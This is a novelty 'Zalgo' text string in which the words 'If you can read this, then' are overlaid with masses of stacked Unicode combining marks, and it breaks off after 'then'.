̵̨̢̧̡̧̨̢̢̢̧̢̢̨̢͔͕̯̙̺̝̳̖̳̲̖̥̪̯̣̼̥̪̤͉̝̠͈̳̹̯̻̺̤̠͉̗͙̜͇̥̯̫̙̠̻͙͙͚͇̤͇̞̼͚͍̭̼͓̭̳͙̤̻͉̦̞͙̮͔͙͕̺͈̭͚̹̹͚̺͔͍̘̹̬̣̳̥̹̤̤͖̮̺̺̬̯̗̰̩͎̼̮̫̭̙͇̥͈̟͙͖̘͙͚̻͉̻̖̺͉̣̖͉̞̝̲̞̗̬͌̍́̈́̋̽̄̓̍͛̉̾̏̈̈́́̋̈́̾̒͑̽̔̍̈́͗́͘̕̚͜͜͜͜͝ͅI̸̧̢̧̝̰̻̲̖͙͙̗͖͚̦̬̘̩̘̜͈̹̗̰̮͙̞͓̰̹̦͔̠̲̣̖͈̭̎̀̎͒̎̈̉̓̀̈̀̎̎̍̆̐͒́͊̇̂̔̍̄̔͌̌̄̈́̌̈́̈́̈̾̂̇̓̆̾̋̎̉͂̿͒͘̕̚͘͠͝f̶̨̢̢̢̡̨̧̡̨̢̨̡̢̨̧̨̡̢̡̡̛͖̗͍̪̤͕̩̦̥̜̰̣̖̟̤̭͕̞͈̬̮͈̜̙̤͚̖͔̻̩͚̳͓̘̥̦̗̠͓̯̭̻̝̩͎̟̫̱̭͔͉̮̥̼̪̣̼̩̭̲̲͉̭̮̞̜̣̠͎̘̰̯̻̥͍̫͈̩̩̥̞̟͕̬̯̥̬̮͍̲̼̬̱̻͖̻̮̻͈̪͇̪̞̝̠̮̺̩̜͙͔̼͈̫͇̥̺͈͙̯̣̻̥̘̬͇̲̬̫̰̻͔̟̩̳͕̭͙͓͓̤͉̜͚̪̜̙̙̲̰̝̮͓̬̰͖͉̭̻́̅̈́͗͑̇͌͒̃͒̈́̒͐͊̇̿̈́̉̄̀̅̂͋̔͊̈́͑̎̕͘͜͠͠ͅͅͅͅ ̵̨̢̧̡̧̢̨̡̢̛̛̛͎̙͙̫͖̭̹̺̖̥͔̱̳͎͔͚̺̤̼̯̬̫͓̱̦̰̫̹̩̝̣̝̠̯͚͓̤̖̖̼͉̬̭̟̱̘̟̞̲̲̜̞͇̲̲̠͎̺̦̝̥̟͕̺̰̣̬͚̬̩̩͖̣̜̖͕̬̭͎̲̜̙̟̹̪̻̟̜͚̣̻̩̙̠̣̟̖̖͎̫̳̙̘̹͍̜͕̣̤͔̤̪̫̥͉̜̬͍͎̼̩̟͚̺̹͉̱̭̹̳̝̲̦͍̯̙͓̙͕̜͖͖̹̞̞͈̝̝̜͕̥͍̥͓̲͖̜̜͕̽́̀̈̊̀͒̊̈́͐̍̀̓̊̉̅̀̉͐͊̌̐̆̄̀̂̍̐̈́̑̎͆̅̏̄̍̓̈́̎̆͌͛̔̓̒̈́̀̂̿̎͒͗͊̅̅̓̂̊̆̄̊̂͛͊́̐̾͋̄̀͗͌͗̉̓̒͆́̓̉̆̎͂̈́͐̕̕̚̕̕͜͜͜͜͝͝͝͝͠͝ͅͅy̷̧̡̡̧̧̨̡̢̡̛̛̛̛̞̫̭̤͇̗̜̞̥̖͇̫̠͎̜̝̹͚̺̗̯̯̭̘̳̖̳̺͚̟͓̠̹̟͎͕̠͎͕͔̻̥̦̠̻͎̳̳̰͓̫̳̖̤̺͐̔̄́̄̑̈̓̍̉́̏͂͐̾̉͆̾̈̃̃͌͊̉͗͋̋̎͆͂̑̃͋̆̅̓͛̌̃̎̂̑̉̌̆͛̍̉̾̃̀͂̾͌̌̓̿͊̌͑́͌̀̇͛͊̀̀͗͆́͑͒̿̀́̾̓̉̍̅͆͐̔̋͌̊̅̇̇͋̅̍̊͒̑͂̅̅̀̓͋̊͊͆͑̋̇̈́̀́̅̊̎͂̋͑́̑̿̏̐͐̈́̍͌͛̂̎̎̂͆́̎̀̏́͗̌̉̊̈͑͌̔͌̈́͑̊̚̕̚̕̚̕̚̚̕͘͜͠͠͝͠͠͠͠͝͠ͅͅǫ̶̨̨̡̨̧̧̡̨̧̨̢̡̡̧̨̡̢̡̡̢̧̡̨̧̢̡̡̡̡̛̛̛̛̻̭͙̯̺͓̜̖͈̬̤͔͇͉̥̱̮̯͔̫̼̥̩̹̜̤̱̬̟̲̬̺̠͙͙̬̗̣͙̗̼̗̙̞̘̲̤̯̞̱̖͉̫̻̯̦̳̙̫͓̼̣͈̳͚̯̞͖̟͖̞̪̝̼̪͍̲͖̟̘̱̮̦͓̤̩̫̦̻̱̱̯͕͔̮̞̟͓̲̗̻̫̫̫̯̪͙̯͙̪̜̗̰̦̺̲̜̣̪͓̪̳̲̞͈̟̬̮̙̟̼͙̭̦̣̻̝̭̥̣͔̞͈͕̯̺͚̮̱̗̖͍̼̼̬̺̗̙͕̘͖̹̣̠̩̱͍͇̪̜̹̤̖̪͕͍̙̗̻̥̱͇̥̲̫̮̹̗̦̩̹̦̝͙̲̥͕̺͕͚̻̣̲̟̜̘̖̥̥̹͙͕̊͌̈̐̎̀̇̽̇̀̈́̉̎̀̍̌̌̀̏̒͛͆́͗̋͌̔̍́̈̾͒̀̑̈̑̀̌̈́̇̋́̎̇́̊͊͗̉͂͒͊̓͛̓̓̋̒̿̐͆͋̉̊̇͌̾̈́̅͆̌̈́̊̑̆̉̌̇́͌̽̏̂́̃̀͒͛̓̃̌̓̉̿͗͂̉̾̽̓̊̊̓̓̏͐̓̅̀͒́̓̾̃̀͋̎̔̒̑̒̕̚̚͘̕̕̕͘̚̕͜͜͜͜͜͜͜͜͜͝͝͝͝͠͝͠͠͝͝͠͝͝͠͝͝ͅͅͅͅų̵̢̧̡̧̨̢̢̨̧̗̝̤̩̗͈̼̩̻̤̞͖̜͓̰̥͓̝̬̲̝̪̬͔̦̖͕̱̞̖͍͔̰͕̬̝̼͙̪̝͓͚̣̥̰͈̖̹̜̜͎̝͖͍̭̯̹͈̣̖̮̟̼̥̩̪̹̳͎̙̖͚̳͚̗̠̱͙͉͙̺̭̥͙̠̻̯͇̻̯̯̼́͋̌̓̈́͋́͗͒͒͌̈̏̊̍̉̓͒̋͐̅͆͂̄̓͐̋̃̚͠͝ͅͅ ̸̨̛̛̘̹̓̆̈́̿̈́͑̎̔̉̇̈́̈̿́̽̋͊̆̋̇͗̒͒̈̽̆͐̉́̆͂̌̍̇̐̎̈́̐̔͑͑̅͑̈̈͌͂̔́͆́͆̓͂̈́̐͂̓̎̂̉͆̇̅̎̾́̀͊̀̽̀͗̽̏̅̊́̆̌̚̕̚̕͘͝͝͝͝͝͠͠͠͝ç̵̡̢̨̢̧̨̡̨̢̧̢̧̧̧̢̢̢̧̡̡̢̧̛̛̛̳̰͉̤͔̱͙̤̟͖̮͙̰̫͚̹͓̻͙͚̫̟͖̲̮̣̰̣̫͕̪̱͙̫̟̰̳̻̫̤͖͖̞̞̗̺͇͍͇̭͔̗͖̪̖̥͉̙̘̪̠͔̮̤̲̻͍͉̦̞͎͕̬̗̟͉̯͔̦͕̯̭͙̤̭͎͕̦̰̯̜̥̗͓̟̣̘̞̙͓͍̤͉͔̤̗̼̘̳̼̱̲̭̻̝̬̙͎̳͖͈̙͇̗͇̩̥̣̣̘̯͈͖̝̘̭͍͙̻̮̯̬̯̯̯̫̘͚̭̗̟̗̳̟̰̠͕͚͓̹̩̫͈͖̥̼̩̤̩͎͖̤͖̬͍̦͎̩̥̖̙̹͈̜͔͇̦̲̜̻̰̩͕̮̥͇̜̙̣̤̪̻͎̬̲̰̼̳̅͌͛̽̒̑̆͗̓̈́̈́̏̑̽̀̇͂̎̐̋̎͛̑̀̀͂́͂̽̎̑̌͋̀̄͗̇̍̔̔̅͌͐̍̓̈́̿́̈́́̌̏͋̒̆̀͑͊̃͌́͂̄̇̾̃̌̉̀͊̋̀̓̓̀̈̊̑̐̌͊͗͆̊̎͒̽͊̉́̎̂̎͆̈́͐̾̉͐̑̑̾̂̋̓̽͊̈́̆̈́̇̀̌̉̑̿̋̃̓́͒͊̄̓̈́̏̅̐̋̑́̚̕̚͘̚̚̕͘͘͜͜͜͠͠͝͝͠͠͝ͅä̷̡̨̢̨̨̧̨̡̧̨̨̡̡̧̧̢̨̛̛̛̛̛̛̛̱̞͓̣̯̞̮̫̮̗̮̝͎̟̟̺̤̮̺̙͖̬̪̯̹͚̥͇̖̣͖̼̦̯͚̬͖̪̥̤͚̰̳͚̣̰̼̱̣̥̗̥͈̳͍̦̫̪̼͍̗̟͚̤̜̥̞̞͇̮̰̙͓̳̼͓̩͎̜̯̭̞͖͉̫̜̩̞̹̺̠̗̘͕̫͖̯̼̙̳̥̹͎̰̙́̉͌̎̈̐̉́̾̽̑̊̋́̀̒̔́̄́̄̌̎̌̔͑̅̃̾̂͂̇̇̏̄͋̎͗̎͗͆̈̌̊̃̂́͒̄̋̓̌̆̈́̾̈́̀̀̌͒̓̎̓̌͐̈́͂̓̽̋̓̽͂͑͋̎̓͊̅̌̍̉̈͗̀͌̈́̊͑̋̊̀̃̐̐̽̒̄̀̈͂̓͒̍͗́̔́̅̆̄́̌̀̈̒̍̓͂̍̔̂̔̈́̄̀́͒́̐́̏̐̅̏͛̎̐̏́͌̂͑̄̽̆̑̉͗̊̓̐̐̽̃̉̔̋̓̽͗͊̓̔͆̎̌̈́͑̑̃͘̕̕̕͘͘̕̕̚͘̚̕̕͜͠͝͝͠͠͠͝͝͝͝ͅͅṉ̴̢̧̡̨̧̢̢̢̡̢̢̧̡̨̛̛̛̛̛̛̛̛̛̹̲̲̲̫̥͔̱̪̝̬̦̤̹̯͍͖̦͖̻̟̖̹͎̞͈̰̯̖̥̳͎̥̞̩̰̹̲̠̺̖̝̬̹̰̮̫͓͓̞̥̻̗͍͓̖̩̠̱̞̱̣̜͚̤̲͍̮̳̠̼̭͎̦̖̗̲̟̦̻̰͍̖̟̖̲̯̲̣͔͇͎͔̹͔̱̪̹̼̹̙̲̙͚̣̟͎͙̺̳̹͙͕̙̞̩̲̞̻̗͖͈̱̠͖͙͉̜̙͇͈͓̝̙͚̘͖͚͓̘̯̫̖̜̘͖̺͙͔̻̭̲̲̫̦̠̝̳̩̮̤̪̼̺͚͍̹̭̺̜͈̺̭̹̲̮̫̞͍̫̱̠̜̹̹̦͈̘̩̯̺̱̈́̈̂̽̇͒̄̈̏̈̀̀̀̈͒̍͂̈́̓̀͛̀̒̈́̔̐͑̀̽͛̑̍͑̔̈́̉͆̉͂̒̄̅̎́͊̀͛̏̊͆́͛͒̈̔̌̾́̈̽̒͑̂̅̽̈̈́͒̊̔̈́̄͆̌͒̽̀̓̎̋̊̋͑͌͐̋̊͗̓͌̅̇̒̆̈́̈̔̽̋͆́͑̒̈̔̓̌͐͒̂̿̀̍̑̌̒̌̓͗̃̀͑͛̃̌̑̂͛̊̄͒̅̑̈̽̎͆̑̅̓̊̓͐̅̍̇̀̐̈̎̃̀̋̊̊̇̐̇͑̐͋̒̄͌̽͑̊̇̎̽̐̈́̏̇͋͐̋̆̽̐͛́̍̅̅̊͐̚̚̕̚̕̚̚̚̕̕̕̚͘̚͘̕̕͜͜͜͜͝͠͝͝͝͝͝͠͝͠͠͝͠͝͝͝͝͠͠ͅͅͅ ̷̨̛̛̛͉͓̞̖͍̹̜̲͕̺͚̣̞̮̝̝̟͍̞̾͑̐͋͆̀̌̀̇̃̀͒̈́͐͌̆͗̐̾̃́̌̐̒̇͑͆̆̆͗̈̊͒̓̔͆̽̅̔̽̋̆͐͋̽̀̍͑̌̇̄̓̈́̽̈́́́̌͐̇̌̒͊́̎̃̄͗̊̾͑͌́́̈́͑̎̐̐̉̅͌̌͌̎̿͊̈́̅̅̀͛̽̌́̀͌̅͂̈́͊̈͑͆͆̏̀̍̔̓͂̄̕̚̕̚̚̚̚͘͝͠͝͠͠͝͝͝͝͠ŗ̷̡̢̧̢̨̡̨̨̧̢̢̡̧̡̨̧̧̛̛̛̜̟͇̥̗̤͈̹͕͕͓͉͉̲̜͎̼͎̭̮̬̖̳̘̜̤͚̙̗̦̰̪͕̙͔̻̫͎̫͇̤̪̗̲̫͔̣͓͖̲͎̹̳͔̙̥̥̫͎͔̪̮̫͇̠̦̪̱̬͔̹̯̩͈̮̞̟̖̠̬̘̟͇̺̗͍̙͙̺̪̟̻̟̰͈͖̙̘̠̭͍͎̟̻̒̔̈̑͛̈́̐́̔̅̿̄̓̋̌̉͒̂̈̈̿̄̊̃̾̌̓́̇̃͗͐͆̓̇͋̀̉̇́͒̽̒̆̍͋̃̀̒̇̎̑̿͆͂̍͌̀̓͋̒̊́̆͒̿̉̋͂͑͆͒́͊̎̿͂̔̄̎̈́͐͋̿̋̒͆̔͌̐̂̐̿̿̇͗͗̈́̈̋̾̈̈̆̈́͐͂́̽̇̑̀̃̊͛̆͂̿̈͊̄͋̆̌̀́͒̅̄̑̈̿̍̑̐̚̚̚͘͘̕̚͘̚̚̚̕̚͜͜͜͠͝͝͠͠ͅͅͅͅͅͅͅͅe̸̢̡̧̡̢̨̨̧̨̡̢̢̢̧̡̡̡̢̧̧̛̛̛̲̜̖̰̺̯̙͖̫̗̪̰̗͕̫͕͙̯̯̪̪̯͚̫̠͇̖͓͖̦̠͚͇̞̱͎̱̼̹̟̬̦̤̜̲̗̹̝͚͖̮̼̰̳̯͚͚͍̯̱̥̣̺͇̩̤͓̠̹͇̭̰̥͓͖̞̯͚͎̹̣͉̜̻̻̫͙̰̙̟͈͎̫͓̣̟̮̦̜̳̬̘͕̠̺̫̳̺̗̟͍̹̜̖̩̝̖͕̙̰͈̦̣͉̻̙̦̙̩̰̠̳̬̳̤̩͈͈̭͍̯͇̯̳̠̫̘̫̪̠͉̻̦̳͈̲͇̣͖͍̗͍̮̜͖͈̼͚̙̝̟̰̿̒̌͂̀͆͊́́̀̀͆̑̌͂̀́͐́̿͋͐͑̂͛̿͋̉̒͗̽̆̽̂̃̋̃̍̐̾̇̇̑̽̃̋̃͊̓͆̀̀͂̔̏̈́̍̓̔͛̔̌̀̈́̏̎͗̇̉̐̉̆̀̒̍̎̓́͐̍͌̑̂͊͋̾̌̂̾̋͋̈̄̾̔̏̎͒͒̔̿̔̚͘͘̚̚͜͜͜͜͜͜͜͝͝͝͝͝͠͠͝ͅͅͅā̶̡̢̡̨̨̢̧̧̨̨̡̡̛̟̦̘̼̟̭͕̯͙̩͍̦̘̘͈͓͎̗͈̺͉̟̜̘̙̱̘̻̯̹̗̻͕̜͍̳̼͔̤͕͓̗̯̹̤̥͖̻̗̗͎̪͎̥͍̗̲͕̯̝̗̝̬̤͎̦͓̱̪͚͔̉͋̑̀̉̒͊̈́́͛̀̑̋̒̿̒̌̊̓̋̓̌͑̈́̌̄̎̇̓̉̿̍̊͊́̈̾͛̓̇̿̈́̄͑̃̿͆̈̇͌̕͜͝͠͝ḑ̸̡̢̢̨̧̧̡̡̢̡̢̨̡̧̧̡̧̨̨̡̧̧͖̝̯͇̟̹̖̳͖̺̬̤̣̞̮̫̗͓̩̹̦̦̼̼̝͙̦̤̝͈͇̹̥̤̺̬̳͎̙̻̪͖̳̟̥̗̪̭̯̺͚͚͍̙̲͙̱͔̩̯̜͕͍̮̼͉͈̖͇̻̦͉͇̙̖͈͉̩̫͎̣̳̱̺͓̺̠̬͚͉̹̯̠̻̩̱̝͉͈̫͈̻̩̲͓̻͈̭̈́̾͂͐͂̾̐̾̌́̇̽̇̋͒͂̀͋̇̃̽̄͋͌̄̐̂̔̅̿̈́͌̅͐͌͐̑͆̾̒̕͘͘͘͜͜͝͝͝͝͝͝͝͝ͅ ̶̧̢̛̺̥̩̤͇͔̠̙̙̼̟͉̖͎͍̗̬̞͔͓͔̫̯͕̬͇͍̥̯͍͉͖̯̼̠̺̠̫̠̯̬̳̭̬͖̖͔̻̓̊̌̆̒̈͐̽͐̋̂͑̌̔̈́̋͌͑͂̿̈́̂̄̆̀́̎͋̇̀̏̓̃̉̿́̍͗̈́̏̒͆̀̈͊̋̋̈́̅̈́͌͋͋̒̽̋̃͂̍́̾̀͐̉͗͊̿͋̍͗̀̀̆͂̍̈́̂̑͋̐̄͆̋̉͐̈́̊̈͂̆̍́̿̐͆̃̉̉̀͐̇͑͗̈͊͆̾̇͊͋͛͐͑̄͐̒̀̏͆̋̔̎̏̽̃̒̃̄͋͆͋́̆͐̔̃͑̑͌̒̓͆͒̐͆̿͆͗̔͆̃̿͂͗̍͛̽̈̚̚̚͘̕͘̕̕͘͜͜͝͝͝͝͝͠͠ͅͅt̴̡̡̡̧̢̢̨̡̛̥͔̭͕̞̣͈͖̭̪͕̭͕̙̭̖̟͔̦̘͎̹͚̣̺̟̭͖̻͇̤̼͈̳̩̞̹̙̣͚̗̜̣̜͇̭̘͉̖̰̖̦̼͔͓̘͉̲͖̤̘̹̩̻͉̤̯̦͉̗͔̬̱̘̗̙̠͍͇̜͍̪̱̟͈̭͎͇͎̱̼͎̗̹̝͙̣̲̜͔̯̭̟̙̦̟͇̞̯̫̯͖̱̟͚̯̥̟̙̮̤̠̞̟̘͂̓̌̐͗́̐̃̎͌͂̾̏͋̈̈́̀̎̅̔̈́͑̚̕ͅh̴̢̡̢̡̢̢̡̨̡̡̧̢̧̢̧̧̨̡̡̧̢̛̛̛̛̛̞̘̥͇̲̮͍̣͚̺̘̳͍͔̹͕̟̼̩̘͈̻̥̣̪̮̭͔̺͔̭̘̲͍̝͔̣̱̩̖̝̝͔̭͚͚̠̙̫͓͈̰̹͍͈̫̣͔̘͇̹̣̖͚͍͚̻̖͙̟͖̜͔̯̬̠̥̖̪͚̦̙̹͈̞̞͔͍̺̘̩̝̭̬̱͙͔̟̺̞̤͎̣̟̮̹̗͇̦͙̩̬̯̖͖͚̥̼͕̲͈̻͎̲͍̱̠̟̱̞̜̥͇̹̘͎͇̪̩̲̼̬͎̜̱̫͈̱̬̜̬͙͙̩̳̩̹̟͈̣̝͉̩͖̞̲̯̱̙̫̘̖̣̼̲̘̘͙̙̩͇̤̫͍̹̣̫͙̦͓̼̦̫̮̰̜̫̭̲͇̏̋͆̉͊̊̀̋́́̉͆͂̏͆̉̓̈̄̾̈́̽̑̍̏͂͋̎͑̈́̆͌̈́̑̈̏͂̓̉͊̀͋̀̃̆̆̓̋̇̓̔̔̄̈́̓̎͆͆͊͑͂̈̓͂͌́̉̋̒̉̓̑̓̽̉̅̓̔́͒̇̏͛̎̓͌̽̀̀̀͛̃̈́̅͋̀̐̉̓̏̉̅̍̈́̈́͛̀̓̑̀̌͂́̄̑̉́́́̀͋͊̍̃̋͌͋̑͐̈́̓̐́̓̇̅̆̐̅̐͌͐̑̈́̔̏̐͌͂̉̂͘͘̚͘̕̚̕̕̕̚͜͜͜͜͜͜͜͝͝͠͝͝͝͝͝͠͠͝͠͝ͅį̷̧̧̧̡̢̡̨̧̡̢̢̢̡̨̧̢̨̛̛̲̠̼̙̘̤͍͕͈͖̜̤̩̞͍̮̟̪̺̪͕̖͕̺̞̟̣̜͙̤̥̖̮̪͙̘̫̭̫̻̩̯̠̫̥̯̞̲̪̮̟̫̬̰̝͙͍̝̩̥̮̟̬̲̜̥̮͎̳̠̭̳̜̗̜͓̬̠̺͍̜̖̜͚̜̻̗̰̗͓̪̜͔̞̠̳͉͇͎͍͙͔̜̰͖̬̹̞̯͍͓͍̩̬̖̞̳̫͉͈̝̹̳̘͓͖̞̰̘̯̬͎͉̦̭̬͓̳͔̜͓̹̦̤̹͈̥̻̠̪̣̬̱̼̜͉̬̞͇̩̣̗͚̥͇̝̘͙̻͉̝̘̬̖̯̟̭̖͇̭̈̎͛̑̈́̒̉̒́̈́́̊́̇̽̄̈́̂͒̈̾͐̓̈́̏̀͋̀̎̐͛̅̿̉͒̍̔̾̒̆̈́̽͋͌͒͗̌͐̓̏̉̀̓͐̿́̿̌̿͐̒͑̽̿̀̽̈́͐̓̅̾̑͆͗͋̄̌̍̀̓̓̍͂͂́̃͌̐̈́̂̈́͌̿̈́͆̈́̉͊̉̈́͐̂̄͛̃̈̋͂͐͂̈͒̋̍̊̇͌͂̾̏̆͌͂̈́̈̉̈́̀̑͂̈́̃̾̈́̽̓͗̃̈̐͌͋̌̈́͂̏̿̔̋̔̿̌́́͋̿̏͗̈͆̾̇͐̃̉̆͒͋̅͆̎̾͗͌͑̍̍̓͋͋͒̑̋̔̐̅̄̿̒̚͘͘̕͘̕̚̚̚̚̕̚̕͜͜͜͜͜͜͜͜͝͝͝͠͝͝͠͝͝͠͝͝͝͝͝͝͠͠͝͠ͅͅͅş̷̡̧̧̨̧̧̛̺̝̺͉̺̗̱̰̤͓̥̼̝͇̻̥͎͈͕͖͇̟̻͕̰̙͉͉͎͔̦͇̫̝͖͚̟̱̱͔͔̪̭̖͍͈̝̠̬̼̰̰̞͈͔͎̲̝͙̻̼̦̘̠̹͚̯̗̝͈̰̺̣̱̞͎͎̦̺̖͎̩̺̪̟͈̯̥͔͎͉͍̬̮̯̱̺͈̱̗̥̺̱̘̠̗͈̻̫̠̭͖͈̝̤͕̪̦̟͉͉̜̜͕̹̜͈̘̺̘̲̥̳̻̘͖̬͚̬͕̥̖͔͕̤̟͚̱̣̇̈́̿̿̒͗͌̐͗̾͗̅̀̐̓̈̉̀̇̈́̆̃̈̇̎̄̄͌̑̓͛̌͊̾͑̉̐͊͆́͊̑͂͒͂͐̃͊̈́̆͑͛̑̉̎̉́͐͛̇͐̓͌͂̈́̾̂̿͗̈́͑̓̎͒̈́̓͋͒̆̒̐̏̏͋̅͛̅͆͒̒̏̈́̒̀̾͗̌͐̒̏̽̃̐̇͐̈́̂́̈̐̒͌̋̔̂̉̈̑̑̂̆̓̑̍̿̉͋̑̄͂̿͐̓̒͐̂̈́͑͒̒̆̃̍̀̃̈́̏͐̔̊̂̀̾̀̍̈́̏͆̇̌̀́͐̀̈́̐̏̅͌̔͗͑̀͌͂̉̑̊̅͒́̀̾̃͗́̀̄̉̑̀̎̑̌͑́̾̐̀̀̀̊̽̔̌͛̽̀̑̾̉̎͂͋͂̃̃̌̊̃̓̇̒̂̎́͋̒́͗͋̈́̓͐̑̾̆͊̿̔̅͛̏̂̀̈́̈́͌̄̔̓̚̕̚͘̕͘͘̚̚͘̚͘͘͘̕͘̕̕͘̚̕͘͘̕͘͜͜͜͜͜͜͜͜͜͜͝͠͝͠͝͝͠͝͝͠͝͠͝͝͝͝͠͝͠͠͠ͅͅͅͅ,̸̨̡̨̡̧̡̨̢̧̡̢̡̡̡̡̧̢̧̡̨̨̛̛̫̝̲̣̱̩̞͍͚̝͉̙͖̝̱͙̱̜͇̞͖͕̻̼͖̰͇̖̹̲̼͔̼͚̠͔͙͕̺̰̯̠̤͕̗͉̙̞͕̻̥̦̼̬̪̰̲̞͉̦͚̥̖̱͈͎̰̘̭̱͚͕̲͙͍̞͉͉͇̘̗̝̙̮͇̺̣̲͙̪̥̲̦̭̭̱̗̪͕̺̦͇̗͉̞̲͎̞͇̰̞͎̱͈͕͚̳͖͕͈̣̲̗̥̬̳͖̝̞̭̜̟̱̮̩̼̼̦͓͚̫̠̪̣̫͉̫̮̠͔͚͕͕̗̼̻̭̼̲͍̳̫̙͉̞̰̝̲̻̹̹͖̜͍͎͈̘͔͈̩̰̩͖̲̟̞̟̭̟̱͕̳͈͕̤͖͔̣͚̲̯͓̙̙̤̩̺͖̪̫̮̬̩͔̩̩͖̯͖̘̲̪̬̙͇̹͎̲̱̲͇̱̜͙̻̊̇̉̅̽̿͋̅͛͒̌͑̒̿̑̈́̇́̋̉͑͆̽͛̿̈̉̑͊̓́́̓̈́̔̿̀̀̓͌̽̅̓̃̋̆̾̓̀̽̄̏̋̈́͌́͊́̀̾̐̑͗͐̀̓̂͛́̌̐͛̈́͛̉̎́̏͗̌̋̔̉͗̑̉̅̅͊͛̽̑̔̽̀̑̌̄̂́́̔̏̈́́̈́̈́̋̀͌͊̌̽̃̐̄̔̍̊̆̽̾̏́̐̽̑̄̍̈̑͆͒̿͗̐̈̍̈́̀͒̽͌͂͆͑͐̔̌̀͒͆̕͘̕͘̚͘̚̕̚͜͜͝͝͠͠͝͠͠͝͝͠͝͝ͅͅ ̷̧̡̡̧̧̨̡̢̧̢̢̢̨̡̢̧̧̧̢̢̧̡̧̢̡̢̨̡̧̡̧̛͔̞̮͙̰̼͓̲̳͈͈̭̺̳̺̜͔͓͓̟̟̝̖̪̰̰̖̙͕̱̮̗̯̠̝̬̟̫͎͙͉̼͎̹͈͇̜̖̪̮͕̝͍̫̖͖̜̻̫̟̰̝͚̪̟̬̱̰̣̥̬̮̝̹̹̻̝͎̝̜̖̦̟̟͙͔̙̭̹͚̻͇̬̖͉̙͕̥̜̜̪̝͎̰̠̠̟͕̻̼̺̖͙̟̬̝̫̭̼͚̟̣̠͔̦̖̣̳͎̳̠̞̮̮̦̥͎̪̺̬͖̳̤̣͎̮̝͔̖̹͕̗̮̗̬̤̤̠̗̯̱̪̣̯̪̭̹͉̞̬͈̞̗̞̟̻̬̫̦̘̹̱͉̖͍͍̹̰̖͓̞͍͙̗͔̟͎̥̙̮͍͕̗̟̩̰͚̞̳̭̯͖̪̮̹͈̯͍̝̜͓̼̖̖͍͇̩͔̮̳̪͇͍̠̯͓̜͔͍͈͓̘͎̞͚̱̟̠͍̲̰̄̂͌̿̉̿̐̎̔̏́͒͛̆͐̈́͂́͗͂̀͐͂̈̋́̕̚͘͘͘̚͜͜͜͜͜͜͜͜͜͜͜͜͝͠ͅͅͅͅͅt̴̡̡̧̨̨̡̢̢̨̢̨̢̡̧̡̢̡̡̡̢̡̨̨̡̢̧̡̨̢̛̪͚͙͉̞͔̹̤͉̤̭̝̻͉̥̼̯̣͈̩͎̲͇̮̪̗͓̞̪͔̮͕̟̭͙̞̲̣̪̳̥͎̖̣͉͔̖̪̫̯̪̣̯͈̦̜͕͇̼̲̝͎̭͍͇̥͇̯̼͍̭͔͚̘̣̤͔͍̦̖̣̭̘̼͍̭̯̲͕̫͎̟̹̠̲̝̭͍͉͉̱͕̻̻̫̺͚̘̩̫̹̖̩̠̘̯̯̟̺͍̳̖̻̞̗͉̞̜͔̦̺̟̞͇̹̯̱̺͎̭̠̙͎͇̗̱̪͓̻̬̫͈̹̲̭͍̱͍̮͔͓̪̩̪͉̜̙͎̹͚͔̺̩͍̫̠̫̦̹̮̙̠̖̳̂͂͌̈́̽͆͑͐͗͌̌̏̎̀̏͑̒̐̈́͗̊͌̊̉͐̿̂̌̒̈̈́̍̎̈́̌̏͗̓̀̔̑̀͑̊͛̀̃͒͋̈͋̒̄͌͒̑̀̆͐̀̅̃̈́̓̌̍̎̓̌͛̊̈̿̃̐̇̏̏̃̔̐̇͊̎͋̍̒̄̉̔̂̀͗͗̔̊̆̐̽̇̊̎̾̈́̓̇̊̆̌̀̓͆͂̚͘̕͘̚͘͘̚̕͘͘͘͘͜͜͜͜͜͜͜͝͠͠͝͝ͅͅh̵̢̢̡̧̧̡̢̨̨̢̨̧̨̨̧̢̢̡̨̨̢̧̢̨̧̨̧̡̢̧̧̢̧̨̖̬͕̩̟͉̲͉̪̳͔̹͍̘̜͈̰̙̝̦͓͈̹̰̟̝̘̰͔͓͓̦̮͇̦̬͔̥̻̜̣̳͈͙̼̝͈̘̟̻̪͍̻̖̳̬͖̟͓̬̰̗̤͍͓̻͉̝̱̘͉͚̙͈̲͍̫̯̩̲̙̲̯̘̲͕͕̖̪̥̫̘͔̘̪̬͕͙̘̬̲͖̮̰͎̮͙̠͚̘̻͚̰̖̘̩̫̬̺̬͈̤̖̺̯̥̙̞̤̹̺͉̼͖͓̥͈̦̗̝̳̠̟̝͇͕͎̱͈̱̩̪̳̱̮͈̳̯͚̟̰̻̲̗̠̟̜̟̜̥̱̗̼̯̠͓̫̰̳̬͓̩̹͙͓͈͉̗͖̭̻̝͕̘͉̹̬̫̬̖̱̻̞̟̦̲̬̲̞̭͉̭͚͍̫͕̫͓̜̲̰͇̗̼͚̜̱̙̦̩̲͕͚̣͉̪̱̖̹̖̖̰͖̯̟̪̦͎̘̫͕͕̟̞̼͊͑͌̍͒́̍͐̔̊̐͑͛̐̽̌̅̊̊͛̓̏̊́̃́̂̎̂͛̒͒̅̓̓̄́̐̏͒̏̈́͊̒͆̌̑͛͐̾̇̒͊̄̑͒́̌̿͛͒̚͘̕̚͘̚͜͜͜͜͠͝͠ͅͅͅͅͅͅͅȩ̴̢̨̢̡̨̧̡̡̢̡̧̨̡̧̨̧̳͔̹̤̟͇͖͙̹͇̖̥͖͈͕̩͉͕̟̮̭͓̫̳͇͇̫̦̜̜͖̻͖̲̦̲̣̹̳͍̫̯̜̱̱̼̭̪̯̰̯̹̯̬̠̝̺͇̗̜̺̯̣̼̬̭͔̦̠̮̠̞͕̟͍͈͕͚̟̞̗̲̮̤͙̙̘̮̭͈̜̫̞̫̖̠̲̼̻͇̠̫͙͓̻̗̭̲̙̺̗̘̦̣̦͖̙̮̟͉̬͔͖̲̲̱̗̠̮̦͓̜̪̫̦̻̘̫̯̩̭̠̜͎̤̫̫̙̱̣̱͕̜͕͙̻̘̥͓̥̤̰̲̭͉͙̲͚̳͓̭͚͖̼͚͎̤̜̳̖͉̭̟̰̜̻̰̒̃̏̒̃͂̈̏̿́́͒͐͑͜͜͝͝͝ͅͅͅn̵̛͊̈́̆̃̂͛̐̃̓̐̔̄́̇̎̃̅̒̔͊̂̒̄͋̾͒͒̈́̏̉̌̈́̌͗̋̀̂̀̅͌̇̋̑̿̒̓̓̀͌̍̀̉̊͌̇̋̓͂̀̒͌̅̍̿̀̍͆͑̋̄͑͒̊̃͛̉̅̒̿̒́̈́̓̈́̏̅̊̾̈́̽͗̃̀̋̅͊̍̆͂̿̎̋̒͒̋̏̽͑̍̇͆̀̿̏̆̽͐̇̒̅̉̈́̊̿̒̀̂͒̃̽͂̓̋̓͐̾̐̾͛̕̚̚̕̕͝͝͝͠͝͝͝͝